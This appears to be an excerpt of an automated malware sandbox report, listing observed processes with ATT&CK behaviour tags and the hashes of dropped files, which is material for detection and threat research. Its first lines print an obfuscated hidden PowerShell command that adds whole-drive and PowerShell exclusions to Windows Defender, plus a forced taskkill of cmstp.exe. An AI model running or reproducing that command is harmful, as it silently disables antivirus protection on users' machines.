C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4564
-
C:\Windows\system32\taskkill.exetaskkill /IM cmstp.exe /F1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4212
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD54a94b4432dca934df6651a53f56abe6b
SHA11461c5bc22eaef55ed98713d67a4c5f5c8e11d69
SHA25663455ddf3d736ca85a5a6805851142c18f28b9987d5f6caa9dd490269b34f8a2
SHA5128f262e5b722138e3b1576e89528a46c031a0239939d45916e0a688ca802c6de3d3ddf19391a6b5660ac7fb9dc9da25eb9c2ad8fd77ed798175a09e2095cb94b6
-
Filesize
1KB
MD5f11fe3657a4a404e5b1b59e4956eb26f
SHA158bff9c85eda1c987ff1a56afb967abc74cd1ac0
SHA256a2b73bc78aecd49d8af8acf5423fcf956699295c05d359475ea60d373ee02f89
SHA5127f75d3ea4671765db036234713336b1bc02a224e0d6adde74d0237b166afa76cf54892edc8bf7349134e51932074baabbcbec9b381d26ca903e83feb313be7c2
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
269KB
MD5245dd461fa69b6c1d8abbf653b318cff
SHA190c2ac95dbb0eb62c94b835dd38cc81af9ff1e70
SHA2566d582333e7c644edbc40e5856c267f5d321c33d705940a7e3450795fa1bebc3d
SHA512aba92cb3c4804d86c1d3ce457603918cf961e23c76d9de1af3eb5d80fb3b5903e56bfb8da007848a5d341d7100a1404ae472db3ebd1529be51a5f63c7d4e40f7
-
Filesize
4KB
MD537d8119413cfecb307de976d233cad33
SHA1e2ede6220cf292b5b0a961c55967849960ade1eb
SHA2560973217e59d2cfd975c09cb6c840cc06004fbb13cdfde441051f29e567163cb6
SHA512ec5974362a1c2eba1a24a7007fb2541420ccc8632983d0661fead116dcd6c31ff0dcfdf9e158f2d33f62c8e70ce6bdf05199e58f906bf666968a9a9323b4ebc6
-
Filesize
663B
MD527581dbbe3c3840ce72f99c21071898a
SHA1898afeb9523df9367c74a01c0dbecf6b637f3cb1
SHA256c5f2bbdebccd52c3eba3c97a251ffa2ccd01f64de764e560f804045fe868d27b
SHA5120b9c4531e8be5b292638cb2cad7fd1b72ed3f1aa20ea027b9a013a8bfb2daaa4a25a40c37423e0924d110bbbbfad4a6e21aa03f4694978d205d7ac9739567d9f
-
Filesize
652B
MD5e8ed12815c6f86e36eeaac3272ac02b7
SHA1f7813a3e94e5f75d402659b092618da7a3c62014
SHA2569619b1067a70bf00efa11b41204bdf1e22ef8a186cdbbfef2c21e53ae7f69765
SHA512d8a361fc0205f28e01a57aef6f4d51c6314c3544a645a572c7bdc618ba00072a75272a5c90dacc4160da33bbdcf008fabade84d2c4cace50857421db2392c57a
-
Filesize
2KB
MD5b8106096972fb511e0cf8b99386ecf93
SHA13003ba3a3681ba16d124d5b2305e6cc59af79b44
SHA25649d2a0f78cbec3d87396b6f52f791c66505edeec87a70d4ce45721288210da02
SHA512218bd9cd17c56d2e138205a197780cc2a5a81bfce7d5439eecb168f61955ba97793e7333425c064f6b6337e1f70c75bd373a7fb502a8c538fb046600018f871e
-
Filesize
369B
MD50628ba4c356d125e1a3ff5e39528d291
SHA16f0f0c12db075b0be0ce540ecd5bf3918362710d
SHA256aabafb9471e37f9946ad646964e1fa3509f9ab49ab235345d7eb663253729dcf
SHA5120166f54ebb6fcc49fb6e3e41ddc5e2560c308775319934f6253678d73b9700703809ec45ad8a1164e7d2edbe60256d12fb1689ca66fd2a697ca6b4bd56d52c0f